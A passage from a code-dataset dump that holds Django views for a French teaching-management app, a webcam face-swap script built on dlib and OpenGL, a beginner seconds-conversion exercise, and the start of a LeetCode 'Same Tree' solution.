request.POST['idModele'])\n\t\ndef supprimerUE(request, idModele, idUE):\n\t\n\ttry:\n\t\tmodeleUE = ModeleUE.objects.get(id=idUE)\n\texcept ModeleUE.DoesNotExist:\n\t\ttitreErreur = 'Erreur de suppression du modèle d\\'UE'\n\t\tmessageErreur = 'Le modèle d\\'UE que vous souhaitez supprimer n\\'existe pas.'\n\t\tdetailsErreur = []\n\t\tpageRetour = '/gestionEnseignement/modifierTreeViewModeleFormation/' + idModele\n\t\treturn render(request, 'erreurUtilisateur.html', locals())\n\t\n\tif request.method == 'POST' and 'formulaireDeConfirmation' in request.POST:\n\t\n\t\tmodeleUE.delete()\n\t\treturn modifierTreeViewModeleFormation(request, idModele)\n\t\n\telse:\n\t\t\n\t\tactionUtilisateur = 'Supprimer le modèle d\\'UE ' + modeleUE.intitule\n\t\tvaleursPOSTAConserver = []\n\t\tlienActionUtilisateur = '/gestionEnseignement/supprimerUE/' + idModele + '/' + idUE\n\t\treturn render(request, 'pageConfirmation.html', locals())\n\ndef paramModifierModule(request, idModele, idModule):\n\t\n\tmodule = ModeleModule.objects.get(id=idModule)\n\tform = ModuleForm(instance=module)\n\t\n\treturn render(request, 'enseignementManager/modifierModule.html', locals())\n\t\ndef modifierModule(request):\n\tmodule = ModeleModule.objects.get(id=request.POST['idModule'])\n\tform = ModuleForm(request.POST, instance=module)\n\t\n\tif form.is_valid():\n\t\tform.save()\n\t\n\treturn modifierTreeViewModeleFormation(request, request.POST['idModele'])\n\t\ndef paramAjouterModule(request, idModele, idUE):\n\t\n\tue = ModeleUE.objects.get(id=idUE)\n\tform = ModuleForm()\n\t\n\treturn render(request, 'enseignementManager/ajouterModule.html', locals())\n\t\ndef ajouterModule(request):\n\t\n\tform = ModuleForm(request.POST)\n\t\n\tif form.is_valid():\n\t\tmodule = form.save(commit = False)\n\t\tmodule.modeleUE = ModeleUE.objects.get(id=request.POST['idUE'])\n\t\tmodule.save()\n\t\n\treturn modifierTreeViewModeleFormation(request, request.POST['idModele'])\n\t\ndef supprimerModule(request, idModele, idModule):\n\t\n\ttry:\n\t\tmodeleModule = ModeleModule.objects.get(id=idModule)\n\texcept ModeleModule.DoesNotExist:\n\t\ttitreErreur = 'Erreur de suppression du modèle de module'\n\t\tmessageErreur = 'Le modèle de module que vous souhaitez supprimer n\\'existe pas.'\n\t\tdetailsErreur = []\n\t\tpageRetour = '/gestionEnseignement/modifierTreeViewModeleFormation/' + idModele\n\t\treturn render(request, 'erreurUtilisateur.html', locals())\n\t\n\tif request.method == 'POST' and 'formulaireDeConfirmation' in request.POST:\n\t\n\t\tmodeleModule.delete()\n\t\treturn modifierTreeViewModeleFormation(request, idModele)\n\t\n\telse:\n\t\t\n\t\tactionUtilisateur = 'Supprimer le modèle de module ' + modeleModule.intitule\n\t\tvaleursPOSTAConserver = []\n\t\tlienActionUtilisateur = '/gestionEnseignement/supprimerModule/' + idModele + '/' + idModule\n\t\treturn render(request, 'pageConfirmation.html', locals())\n\ndef homeBAC(request):\n\treturn homeBACMessage(request, False)\n\ndef homeBACMessage(request, messageAAfficher):\n\n\tif request.method == 'POST':\n\t\tform = BACForm(request.POST)\n\t\t\n\t\tif form.is_valid():\n\t\t\t\n\t\t\ttry:\n\t\t\t\tbac = BAC.objects.get(intitule=request.POST['intitule'])\n\t\t\t\t\n\t\t\t\t# Erreur, bac déjà existant.\n\t\t\t\ttitreErreur = 'Erreur de création du BAC.'\n\t\t\t\tmessageErreur = 'Le nom du BAC doit être unique.'\n\t\t\t\tdetailsErreur = []\n\t\t\t\tdetailsErreur.append('Il existe déjà un BAC nommé : \\'' + request.POST['intitule'] + '\\'')\n\t\t\t\tpageRetour = '/gestionEnseignement/BAC'\n\t\t\t\treturn render(request, 'erreurUtilisateur.html', locals())\n\t\t\t\n\t\t\texcept BAC.DoesNotExist:\n\t\t\t\t\n\t\t\t\tbac = form.save()\n\t\t\t\tmessageAAfficher = 'Le BAC ' + bac.intitule + ' a bien été ajouté.'\n\t\n\tetus = Etudiant.objects.all()\n\t\n\tlisteBACNonSupprimable = []\n\t\n\tfor etu in etus:\n\t\tlisteBACNonSupprimable.append(etu.BAC)\n\t\n\tform = BACForm()\n\t\n\t#On récupère tous les bacs présents dans la BDD en vue d'un affichage\n\tmodelesBAC = BAC.objects.all()\n\t\n\treturn render(request, 'enseignementManager/ModelesOnglets.html', locals())\n\ndef supprimerBAC(request, idBAC):\n\t#On récupère le BAC dans une variable avant de le supprimer, afin d'avoir accès à son intitule.\n\ttry:\n\t\tmodeleBAC = BAC.objects.get(id=idBAC)\n\t\t\n\texcept BAC.DoesNotExist:\n\t\t# Erreur, BAC inexistant.\n\t\ttitreErreur = 'Erreur de suppression du BAC.'\n\t\tmessageErreur = 'Le BAC que vous souhaitez supprimer n\\'existe pas.'\n\t\tdetailsErreur = []\n\t\tpageRetour = '/gestionEnseignement/BAC'\n\t\treturn render(request, 'erreurUtilisateur.html', locals())\n\t\n\tif request.method == 'POST' and 'formulaireDeConfirmation' in request.POST:\n\t\t\n\t\tmessageAAfficher = 'Le BAC ' + modeleBAC.intitule + ' à bien été supprimé.'\n\t\tmodeleBAC.delete()\n\t\trequest.method = 'GET'\n\t\treturn homeBACMessage(request, messageAAfficher)\n\t\t\n\telse:\n\t\t\n\t\tactionUtilisateur = 'Supprimer le modèle de BAC ' + modeleBAC.intitule\n\t\tvaleursPOSTAConserver = []\n\t\tlienActionUtilisateur = '/gestionEnseignement/supprimerBAC/' + idBAC\n\t\treturn render(request, 'pageConfirmation.html', locals())\n\ndef paramModifierBAC(request, idBAC):\n\t\n\tmodeleBAC = BAC.objects.get(id=idBAC)\n\tform = BACForm(instance=modeleBAC)\n\treturn render(request, 'enseignementManager/modifierBAC.html', locals())\n\ndef modifierBAC(request):\n\n\tmodeleBAC = BAC.objects.get(id=request.POST['idBAC'])\n\tform = BACForm(request.POST, instance=modeleBAC)\n\tmessageAAfficher = 'Le BAC à bien été modifié.'\n\tif form.is_valid():\n\t\trequest.method = 'GET'\n\t\tform.save()\n\t\n\treturn homeBACMessage(request, messageAAfficher)\n\t\n\"\"\"\nGestion des cursus :\n\"\"\"\ndef homeCursus(request):\n\treturn homeCursusMessage(request, False)\n\ndef homeCursusMessage(request, messageAAfficher):\n\t\n\tif request.method == 'POST': #S'il s'agit d'une requête POST.\n\t\tform = CursusForm(request.POST)\n\t\t\n\t\tif form.is_valid():\n\t\t\t\n\t\t\ttry:\n\t\t\t\tcursusExistant = CursusPossible.objects.get(intitule=request.POST['intitule'])\n\t\t\t\t\n\t\t\t\t# Erreur, cursus déjà existant.\n\t\t\t\ttitreErreur = 'Erreur de création du cursus.'\n\t\t\t\tmessageErreur = 'Le nom du cursus doit être unique.'\n\t\t\t\tdetailsErreur = []\n\t\t\t\tdetailsErreur.append('Il existe déjà un cursus nommé : \\'' + request.POST['intitule'] + '\\'')\n\t\t\t\tpageRetour = '/gestionEnseignement/cursus'\n\t\t\t\treturn render(request, 'erreurUtilisateur.html', locals())\n\t\t\t\t\n\t\t\texcept CursusPossible.DoesNotExist:\n\t\t\t\t\n\t\t\t\t# le cursus n'existe pas, on peut le rajouter\n\t\t\n\t\t\t\tcurs = form.save()\n\t\t\t\tmessageAAfficher = 'Le Cursus ' + curs.intitule + ' a bien été ajouté.'\n\t\t\t\t\n\tform = CursusForm()\n\t\n\t# liste de tous les modeles de cursus\n\ttabCursus = CursusPossible.objects.all().order_by('-id')\n\t\n\t#tableau qui stockera les cursus à ne pas supprimer.\n\tcursusNonSupprimable = []\n\t\n\t#On récupère nos cursus pré/postDUT\n\tcursPreDUT = CursusPreDUT.objects.all()\n\tcursusPostDUT = CursusPostDUT.objects.all()\n\t\n\t#On test tous nos cursus pour voir lesquels sont supprimables/non supprimables.\n\tfor curs in cursPreDUT:\n\t\tcursusNonSupprimable.append(curs.cursus)\n\t\t\n\tfor curs in cursusPostDUT:\n\t\tcursusNonSupprimable.append(curs.cursus)\n\t\n\treturn render(request, 'enseignementManager/ModelesOnglets.html', locals())\n\n\ndef supprimerCursus(request, idCursus):\n\t#On récupère le cursus dans une variable avant de le supprimer, afin d'avoir accès à son intitule.\n\ttry:\n\t\tcurs = CursusPossible.objects.get(id=idCursus)\n\t\t\n\texcept CursusPossible.DoesNotExist:\n\t\t# Erreur, cursus inexistant.\n\t\ttitreErreur = 'Erreur de suppression du cursus.'\n\t\tmessageErreur = 'Le cursus que vous souhaitez supprimer n\\'existe pas.'\n\t\tdetailsErreur = []\n\t\tpageRetour = '/gestionEnseignement/cursus'\n\t\treturn render(request, 'erreurUtilisateur.html', locals())\n\t\n\tif request.method == 'POST' and 'formulaireDeConfirmation' in request.POST:\n\t\t\n\t\tmessageAAfficher = 'Le cursus ' + curs.intitule + ' à bien été supprimé.'\n\t\tcurs.delete()\n\t\trequest.method = 'GET'\n\t\treturn homeCursusMessage(request, messageAAfficher)\n\t\t\n\telse:\n\t\t\n\t\tactionUtilisateur = 'Supprimer le modèle de cursus ' + curs.intitule\n\t\tvaleursPOSTAConserver = []\n\t\tlienActionUtilisateur = '/gestionEnseignement/supprimerCursus/' + idCursus\n\t\treturn render(request, 'pageConfirmation.html', locals())\n\ndef paramModifierCursus(request, idCursus):\n\t\n\tcursus = CursusPossible.objects.get(id=idCursus)\n\tform = CursusForm(instance=cursus)\n\t\n\treturn render(request, 'enseignementManager/modifierCursus.html', locals())\n\ndef modifierCursus(request):\n\tcursus = CursusPossible.objects.get(id=request.POST['idCursus'])\n\tform = CursusForm(request.POST, instance=cursus)\n\tmessageAAfficher = 'Le cursus à bien été modifié.'\n\tif form.is_valid():\n\t\trequest.method = 'GET'\n\t\tform.save()\n\t\n\treturn homeCursusMessage(request, messageAAfficher)","sub_path":"enseignementManager/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":20083,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"509107385","text":"import dlib\nimport cv2\nimport numpy as np\nfrom abc import ABCMeta, abstractmethod\nfrom scipy import optimize\nfrom dlib import rectangle\nimport pygame\nfrom pygame.locals import *\n\nfrom OpenGL.GL import *\nfrom OpenGL.GLU import *\n\nfrom scipy import optimize\n\n\nfrom tkinter import filedialog\nimport os\n\ndef getNormal(triangle):\n a = triangle[:, 0]\n b = triangle[:, 1]\n c = triangle[:, 2]\n\n axisX = b - a\n axisX = axisX / np.linalg.norm(axisX)\n axisY = c - a\n axisY = axisY / np.linalg.norm(axisY)\n axisZ = np.cross(axisX, axisY)\n axisZ = axisZ / np.linalg.norm(axisZ)\n\n return axisZ\n\n\ndef flipWinding(triangle):\n return [triangle[1], triangle[0], triangle[2]]\n\n\ndef fixMeshWinding(mesh, vertices):\n for i in range(mesh.shape[0]):\n triangle = mesh[i]\n normal = getNormal(vertices[:, triangle])\n if normal[2] > 0:\n mesh[i] = flipWinding(triangle)\n\n return mesh\n\n\ndef getShape3D(mean3DShape, blendshapes, params):\n # skalowanie\n s = params[0]\n # rotacja\n r = params[1:4]\n # przesuniecie (translacja)\n t = params[4:6]\n w = params[6:]\n\n # macierz rotacji z wektora rotacji, wzor Rodriguesa\n R = cv2.Rodrigues(r)[0]\n shape3D = mean3DShape + np.sum(w[:, np.newaxis, np.newaxis] * blendshapes, axis=0)\n\n shape3D = s * np.dot(R, shape3D)\n shape3D[:2, :] = shape3D[:2, :] + t[:, np.newaxis]\n\n return shape3D\n\n\ndef getMask(renderedImg):\n mask = np.zeros(renderedImg.shape[:2], dtype=np.uint8)\n\n\ndef load3DFaceModel(filename):\n faceModelFile = np.load(filename)\n mean3DShape = faceModelFile[\"mean3DShape\"]\n mesh = faceModelFile[\"mesh\"]\n idxs3D = faceModelFile[\"idxs3D\"]\n idxs2D = faceModelFile[\"idxs2D\"]\n blendshapes = faceModelFile[\"blendshapes\"]\n mesh = fixMeshWinding(mesh, mean3DShape)\n\n return mean3DShape, blendshapes, mesh, idxs3D, idxs2D\n\n\ndef getFaceKeypoints(img, detector, predictor, maxImgSizeForDetection=640):\n imgScale = 1\n scaledImg = img\n if max(img.shape) > maxImgSizeForDetection:\n imgScale = maxImgSizeForDetection / float(max(img.shape))\n scaledImg = cv2.resize(img, (int(img.shape[1] * imgScale), int(img.shape[0] * imgScale)))\n\n # detekcja twarzy\n dets = detector(scaledImg, 1)\n\n if len(dets) == 0:\n return None\n\n shapes2D = []\n for det in dets:\n faceRectangle = rectangle(int(det.left() / imgScale), int(det.top() / imgScale), int(det.right() / imgScale),\n int(det.bottom() / imgScale))\n\n # detekcja punktow charakterystycznych twarzy\n dlibShape = predictor(img, faceRectangle)\n\n shape2D = np.array([[p.x, p.y] for p in dlibShape.parts()])\n # transpozycja, zeby ksztalt byl 2 x n a nie n x 2, pozniej ulatwia to obliczenia\n shape2D = shape2D.T\n\n shapes2D.append(shape2D)\n\n return shapes2D\n\n\ndef getFaceTextureCoords(img, mean3DShape, blendshapes, idxs2D, idxs3D, detector, predictor):\n projectionModel = OrthographicProjectionBlendshapes(blendshapes.shape[0])\n\n keypoints = getFaceKeypoints(img, detector, predictor)[0]\n modelParams = projectionModel.getInitialParameters(mean3DShape[:, idxs3D], keypoints[:, idxs2D])\n modelParams = GaussNewton(modelParams, projectionModel.residual, projectionModel.jacobian,\n ([mean3DShape[:, idxs3D], blendshapes[:, :, idxs3D]], keypoints[:, idxs2D]), verbose=0)\n textureCoords = projectionModel.fun([mean3DShape, blendshapes], modelParams)\n\n return textureCoords\n\n\nclass Model:\n __metaclass__ = ABCMeta\n\n nParams = 0\n\n # zwraca wektor rezyduow przy danych parametrach modelu, wektorze wejsciowym i oczekiwanych wektorze wyjsciowym\n def residual(self, params, x, y):\n r = y - self.fun(x, params)\n r = r.flatten()\n\n return r\n\n # zwraca wartosci zwracane przez model przy danych parametrach i wektorze wejsciowym\n @abstractmethod\n def fun(self, x, params):\n pass\n\n # zwraca jakobian\n @abstractmethod\n def jacobian(self, params, x, y):\n pass\n\n # zwraca zbior przykladowych parametrow modelu\n @abstractmethod\n def getExampleParameters(self):\n pass\n\n # zwraca inny zbior przykladowych parametrow\n @abstractmethod\n def getInitialParameters(self):\n pass\n\n\nclass OrthographicProjectionBlendshapes(Model):\n nParams = 6\n\n def __init__(self, nBlendshapes):\n self.nBlendshapes = nBlendshapes\n self.nParams += nBlendshapes\n\n def fun(self, x, params):\n # skalowanie\n s = params[0]\n # rotacja\n r = params[1:4]\n # przesuniecie (translacja)\n t = params[4:6]\n w = params[6:]\n\n mean3DShape = x[0]\n blendshapes = x[1]\n\n # macierz rotacji z wektora rotacji, wzor Rodriguesa\n R = cv2.Rodrigues(r)[0]\n P = R[:2]\n shape3D = mean3DShape + np.sum(w[:, np.newaxis, np.newaxis] * blendshapes, axis=0)\n\n projected = s * np.dot(P, shape3D) + t[:, np.newaxis]\n\n return projected\n\n def jacobian(self, params, x, y):\n s = params[0]\n r = params[1:4]\n t = params[4:6]\n w = params[6:]\n\n mean3DShape = x[0]\n blendshapes = x[1]\n\n R = cv2.Rodrigues(r)[0]\n P = R[:2]\n shape3D = mean3DShape + np.sum(w[:, np.newaxis, np.newaxis] * blendshapes, axis=0)\n\n nPoints = mean3DShape.shape[1]\n\n # nSamples * 2 poniewaz kazdy punkt ma dwa wymiary (x i y)\n jacobian = np.zeros((nPoints * 2, self.nParams))\n\n jacobian[:, 0] = np.dot(P, shape3D).flatten()\n\n stepSize = 10e-4\n step = np.zeros(self.nParams)\n step[1] = stepSize;\n jacobian[:, 1] = ((self.fun(x, params + step) - self.fun(x, params)) / stepSize).flatten()\n step = np.zeros(self.nParams)\n step[2] = stepSize;\n jacobian[:, 2] = ((self.fun(x, params + step) - self.fun(x, params)) / stepSize).flatten()\n step = np.zeros(self.nParams)\n step[3] = stepSize;\n jacobian[:, 3] = ((self.fun(x, params + step) - self.fun(x, params)) / stepSize).flatten()\n\n jacobian[:nPoints, 4] = 1\n jacobian[nPoints:, 5] = 1\n\n startIdx = self.nParams - self.nBlendshapes\n for i in range(self.nBlendshapes):\n jacobian[:, i + startIdx] = s * np.dot(P, blendshapes[i]).flatten()\n\n return jacobian\n\n # nie uzywane\n def getExampleParameters(self):\n params = np.zeros(self.nParams)\n params[0] = 1\n\n return params\n\n def getInitialParameters(self, x, y):\n mean3DShape = x.T\n shape2D = y.T\n\n shape3DCentered = mean3DShape - np.mean(mean3DShape, axis=0)\n shape2DCentered = shape2D - np.mean(shape2D, axis=0)\n\n scale = np.linalg.norm(shape2DCentered) / np.linalg.norm(shape3DCentered[:, :2])\n t = np.mean(shape2D, axis=0) - np.mean(mean3DShape[:, :2], axis=0)\n\n params = np.zeros(self.nParams)\n params[0] = scale\n params[4] = t[0]\n params[5] = t[1]\n\n return params\n\n\ndef setOrtho(w, h):\n glMatrixMode(GL_PROJECTION)\n glLoadIdentity()\n glOrtho(0, w, h, 0, -1000, 1000)\n glMatrixMode(GL_MODELVIEW)\n\n\ndef addTexture(img):\n textureId = glGenTextures(1)\n glBindTexture(GL_TEXTURE_2D, textureId)\n glPixelStorei(GL_UNPACK_ALIGNMENT, 1)\n glTexImage2D(GL_TEXTURE_2D, 0, GL_RGB, img.shape[1], img.shape[0], 0, GL_BGR, GL_UNSIGNED_BYTE, img)\n\n glTexParameterf(GL_TEXTURE_2D, GL_TEXTURE_MAG_FILTER, GL_NEAREST)\n glTexParameterf(GL_TEXTURE_2D, GL_TEXTURE_MIN_FILTER, GL_NEAREST)\n glTexEnvf(GL_TEXTURE_ENV, GL_TEXTURE_ENV_MODE, GL_DECAL)\n\n return textureId\n\n\nclass FaceRenderer:\n def __init__(self, targetImg, textureImg, textureCoords, mesh):\n self.h = targetImg.shape[0]\n self.w = targetImg.shape[1]\n\n pygame.init()\n pygame.display.set_mode((self.w, self.h), DOUBLEBUF | OPENGL)\n setOrtho(self.w, self.h)\n\n glEnable(GL_DEPTH_TEST)\n glEnable(GL_TEXTURE_2D)\n\n self.textureCoords = textureCoords\n self.textureCoords[0, :] /= textureImg.shape[1]\n self.textureCoords[1, :] /= textureImg.shape[0]\n\n self.faceTexture = addTexture(textureImg)\n self.renderTexture = addTexture(targetImg)\n\n self.mesh = mesh\n\n def drawFace(self, vertices):\n glBindTexture(GL_TEXTURE_2D, self.faceTexture)\n\n glBegin(GL_TRIANGLES)\n for triangle in self.mesh:\n for vertex in triangle:\n glTexCoord2fv(self.textureCoords[:, vertex])\n glVertex3fv(vertices[:, vertex])\n\n glEnd()\n\n def render(self, vertices):\n glClear(GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT)\n self.drawFace(vertices)\n\n data = glReadPixels(0, 0, self.w, self.h, GL_BGR, GL_UNSIGNED_BYTE)\n renderedImg = np.fromstring(data, dtype=np.uint8)\n renderedImg = renderedImg.reshape((self.h, self.w, 3))\n for i in range(renderedImg.shape[2]):\n renderedImg[:, :, i] = np.flipud(renderedImg[:, :, i])\n\n pygame.display.flip()\n return renderedImg\n\n\ndef LineSearchFun(alpha, x, d, fun, args):\n r = fun(x + alpha * d, *args)\n return np.sum(r ** 2)\n\n\ndef GaussNewton(x0, fun, funJack, args, maxIter=10, eps=10e-7, verbose=1):\n x = np.array(x0, dtype=np.float64)\n\n oldCost = -1\n for i in range(maxIter):\n r = fun(x, *args)\n cost = np.sum(r ** 2)\n\n if verbose > 0:\n print(\"Cost at iteration \" + str(i) + \": \" + str(cost))\n\n if (cost < eps or abs(cost - oldCost) < eps):\n break\n oldCost = cost\n\n J = funJack(x, *args)\n grad = np.dot(J.T, r)\n H = np.dot(J.T, J)\n direction = np.linalg.solve(H, grad)\n\n # optymalizacja dlugosci kroku\n lineSearchRes = optimize.minimize_scalar(LineSearchFun, args=(x, direction, fun, args))\n # dlugosc kroku\n alpha = lineSearchRes[\"x\"]\n\n x = x + alpha * direction\n\n if verbose > 0:\n print(\"Gauss Netwon finished after \" + str(i + 1) + \" iterations\")\n r = fun(x, *args)\n cost = np.sum(r ** 2)\n print(\"cost = \" + str(cost))\n print(\"x = \" + str(x))\n\n return x\n\n\ndef SteepestDescent(x0, fun, funJack, args, maxIter=10, eps=10e-7, verbose=1):\n x = np.array(x0, dtype=np.float64)\n\n oldCost = -1\n for i in range(maxIter):\n r = fun(x, *args)\n cost = np.sum(r ** 2)\n\n if verbose > 0:\n print(\"Cost at iteration \" + str(i) + \": \" + str(cost))\n\n # warunki stopu\n if (cost < eps or abs(cost - oldCost) < eps):\n break\n oldCost = cost\n\n J = funJack(x, *args)\n grad = 2 * np.dot(J.T, r)\n direction = grad\n\n # optymalizacja dlugosci kroku\n lineSearchRes = optimize.minimize_scalar(LineSearchFun, args=(x, direction, fun, args))\n # dlugosc kroku\n alpha = lineSearchRes[\"x\"]\n\n x = x + alpha * direction\n\n if verbose > 0:\n print(\"Steepest Descent finished after \" + str(i + 1) + \" iterations\")\n r = fun(x, *args)\n cost = np.sum(r ** 2)\n print(\"cost = \" + str(cost))\n print(\"x = \" + str(x))\n\n return x\n\n\ndef blendImages(src, dst, mask, featherAmount=0.2):\n # indeksy nie czarnych pikseli maski\n maskIndices = np.where(mask != 0)\n # te same indeksy tylko, ze teraz w jednej macierzy, gdzie kazdy wiersz to jeden piksel (x, y)\n maskPts = np.hstack((maskIndices[1][:, np.newaxis], maskIndices[0][:, np.newaxis]))\n faceSize = np.max(maskPts, axis=0) - np.min(maskPts, axis=0)\n featherAmount = featherAmount * np.max(faceSize)\n\n hull = cv2.convexHull(maskPts)\n dists = np.zeros(maskPts.shape[0])\n for i in range(maskPts.shape[0]):\n dists[i] = cv2.pointPolygonTest(hull, (maskPts[i, 0], maskPts[i, 1]), True)\n\n weights = np.clip(dists / featherAmount, 0, 1)\n\n composedImg = np.copy(dst)\n composedImg[maskIndices[0], maskIndices[1]] = weights[:, np.newaxis] * src[maskIndices[0], maskIndices[1]] + (\n 1 - weights[:, np.newaxis]) * dst[maskIndices[0], maskIndices[1]]\n\n return composedImg\n\n\n# uwaga, tutaj src to obraz, z ktorego brany bedzie kolor\ndef colorTransfer(src, dst, mask):\n transferredDst = np.copy(dst)\n # indeksy nie czarnych pikseli maski\n maskIndices = np.where(mask != 0)\n # src[maskIndices[0], maskIndices[1]] zwraca piksele w nie czarnym obszarze maski\n\n maskedSrc = src[maskIndices[0], maskIndices[1]].astype(np.int32)\n maskedDst = dst[maskIndices[0], maskIndices[1]].astype(np.int32)\n\n meanSrc = np.mean(maskedSrc, axis=0)\n meanDst = np.mean(maskedDst, axis=0)\n\n maskedDst = maskedDst - meanDst\n maskedDst = maskedDst + meanSrc\n maskedDst = np.clip(maskedDst, 0, 255)\n\n transferredDst[maskIndices[0], maskIndices[1]] = maskedDst\n\n return transferredDst\n\n\ndef drawPoints(img, points, color=(0, 255, 0)):\n for point in points:\n cv2.circle(img, (int(point[0]), int(point[1])), 2, color)\n\n\ndef drawCross(img, params, center=(100, 100), scale=30.0):\n R = cv2.Rodrigues(params[1:4])[0]\n\n points = np.array([[1, 0, 0], [0, -1, 0], [0, 0, -1]])\n points = np.dot(points, R.T)\n points2D = points[:, :2]\n\n points2D = (points2D * scale + center).astype(np.int32)\n\n cv2.line(img, (center[0], center[1]), (points2D[0, 0], points2D[0, 1]), (255, 0, 0), 3)\n cv2.line(img, (center[0], center[1]), (points2D[1, 0], points2D[1, 1]), (0, 255, 0), 3)\n cv2.line(img, (center[0], center[1]), (points2D[2, 0], points2D[2, 1]), (0, 0, 255), 3)\n\n\ndef drawMesh(img, shape, mesh, color=(255, 0, 0)):\n for triangle in mesh:\n point1 = shape[triangle[0]].astype(np.int32)\n point2 = shape[triangle[1]].astype(np.int32)\n point3 = shape[triangle[2]].astype(np.int32)\n\n cv2.line(img, (point1[0], point1[1]), (point2[0], point2[1]), (255, 0, 0), 1)\n cv2.line(img, (point2[0], point2[1]), (point3[0], point3[1]), (255, 0, 0), 1)\n cv2.line(img, (point3[0], point3[1]), (point1[0], point1[1]), (255, 0, 0), 1)\n\n\ndef drawProjectedShape(img, x, projection, mesh, params, lockedTranslation=False):\n localParams = np.copy(params)\n\n if lockedTranslation:\n localParams[4] = 100\n localParams[5] = 200\n\n projectedShape = projection.fun(x, localParams)\n\n drawPoints(img, projectedShape.T, (0, 0, 255))\n drawMesh(img, projectedShape.T, mesh)\n drawCross(img, params)\n\ndef main():\n print(\"Press T to draw the keypoints and the 3D model\")\n print(\"Press R to start recording to a video file\")\n\n predictor_path = 'shape_predictor_68_face_landmarks.dat'\n default_dir=\"liuyifei.jpg\"\n image_name = filedialog.askopenfilename(title='选择含有人脸的图片', filetypes=[(\"png图片\", \"*.png\"), ('jpeg图片', '*.jpeg'),('jpg图片', '*.jpg')],\n initialdir=(os.path.expanduser(default_dir)))\n #image_name = cv2.imread(file_path, cv2.IMREAD_COLOR)\n #image_name = \"/Users/apple/PycharmProjects/001/data/wuyannzu.jpeg\"\n maxImageSizeForDetection = 300\n\n detector = dlib.get_frontal_face_detector()\n predictor = dlib.shape_predictor(predictor_path)\n mean3DShape, blendshapes, mesh, idxs3D, idxs2D = load3DFaceModel(\"candide.npz\")\n projectionModel = OrthographicProjectionBlendshapes(blendshapes.shape[0])\n modelParams = None\n lockedTranslation = False\n drawOverlay = False\n cap = cv2.VideoCapture(0)\n writer = None\n cameraImg = cap.read()[1]\n textureImg = cv2.imread(image_name)\n textureCoords = getFaceTextureCoords(textureImg, mean3DShape, blendshapes, idxs2D, idxs3D, detector, predictor)\n renderer = FaceRenderer(cameraImg, textureImg, textureCoords, mesh)\n\n while True:\n cameraImg = cap.read()[1]\n shapes2D = getFaceKeypoints(cameraImg, detector, predictor, maxImageSizeForDetection)\n\n if shapes2D is not None:\n for shape2D in shapes2D:\n modelParams = projectionModel.getInitialParameters(mean3DShape[:, idxs3D], shape2D[:, idxs2D])\n\n # 3D model parameter optimization\n modelParams = GaussNewton(modelParams, projectionModel.residual, projectionModel.jacobian,\n ([mean3DShape[:, idxs3D], blendshapes[:, :, idxs3D]], shape2D[:, idxs2D]),\n verbose=0)\n\n # rendering the model to an image\n shape3D = getShape3D(mean3DShape, blendshapes, modelParams)\n renderedImg = renderer.render(shape3D)\n mask = np.copy(renderedImg[:, :, 0])\n renderedImg = colorTransfer(cameraImg, renderedImg, mask)\n cameraImg = blendImages(renderedImg, cameraImg, mask)\n\n if drawOverlay:\n drawPoints(cameraImg, shape2D.T)\n drawProjectedShape(cameraImg, [mean3DShape, blendshapes], projectionModel, mesh, modelParams,\n lockedTranslation)\n\n if writer is not None:\n writer.write(cameraImg)\n\n cv2.imshow('image', cameraImg)\n key = cv2.waitKey(1)\n if key == 27:\n break\n if key == ord(\"q\"):\n break\n if key == ord('t'):\n drawOverlay = not drawOverlay\n if key == ord('r'):\n if writer is None:\n print(\"Starting video writer\")\n # writer = cv2.VideoWriter(\"../out.avi\", cv2.cv.CV_FOURCC('X', 'V', 'I', 'D'), 25, (cameraImg.shape[1], cameraImg.shape[0]))\n\n if writer.isOpened():\n print(\"Writer succesfully opened\")\n else:\n writer = None\n print(\"Writer opening failed\")\n else:\n print(\"Stopping video writer\")\n writer.release()\n writer = None\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"swap_face.py","file_name":"swap_face.py","file_ext":"py","file_size_in_byte":17934,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"110043522","text":"\"\"\"Write a program that takes the number of seconds as input,\nand then converts that to minutes and seconds (for example, 102->1 min, 42 sec)\nand prints the result. Also, if you want, convert it to\nhours, minutes, and seconds. \"\"\"\n\n#Input the time in seconds\ntime = int(input(\"Enter the number of seconds: \"))\n\n#Calculate the number of seconds\nseconds = time % 60\n\n#Subtract out the seconds and calculate how many minutes remain\ntime = (time - seconds) / 60\n\n#Calculate the number of minutes\nminutes = time % 60\n\n#Calculate the number of hours\nhours = (time - minutes) / 60\n\n#Print everything out\nprint(\"This is equal to \" + str(hours) + \" hours and \" +\n str(minutes) + \" minutes and \" + str(seconds) + \" seconds.\")\n\n\"\"\"Note: you can split the print statement across several lines\nto make it easier to read.\"\"\"\n","sub_path":"Class 1/Class 1 Solutions/1.4 - Time.py","file_name":"1.4 - Time.py","file_ext":"py","file_size_in_byte":815,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"249096137","text":"#\n# @lc app=leetcode id=100 lang=python3\n#\n# [100] Same Tree\n#\n# https://leetcode.com/problems/same-tree/description/\n#\n# algorithms\n# Easy (50.77%)\n# Likes: 1352\n# Dislikes: 45\n# Total Accepted: 429.2K\n# Total Submissions: 842.3K\n# Testcase Example: '[1,2,3]\\n[1,2,3]'\n#\n# Given two binary trees, write a function to check if they are the same or\n# not.\n# \n# Two binary trees are considered the same if they are structurally identical\n# and the nodes have the same value.\n# \n# Example 1:\n# \n# \n# Input: 1 1\n# ⁠ / \\ / \\\n# ⁠ 2 3 2 3\n# \n# ⁠ [1,2,3], [1,2,3]\n# \n# Output: true\n# \n# \n# Example 2:\n# \n# \n# Input: 1 1\n# ⁠ / \\\n# ⁠ 2 2\n# \n# ⁠ [1,2], [1,null,2]\n# \n# Output: false\n# \n# \n# Example 3:\n# \n# \n# Input: 1 1\n# ⁠ / \\ / \\\n# ⁠ 2 1 1 2\n# \n# ⁠ [1,2,1], [1,1,2]\n# \n# Output: false\n# \n# \n#\n\n# @lc code=start\n# Definition for a binary tree node.\nclass TreeNode:\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n\nclass Solution:\n def isSameTree(self, p: TreeNode, q: TreeNode) -> bool:\n return self.isSameTree_1(p, q)\n \n def isSameTree_0(self, p: TreeNode, q: TreeNode) -> bool:\n if p and q: return p.val == q.val and \\\n self.isSameTree(p.left, q.left) and \\\n 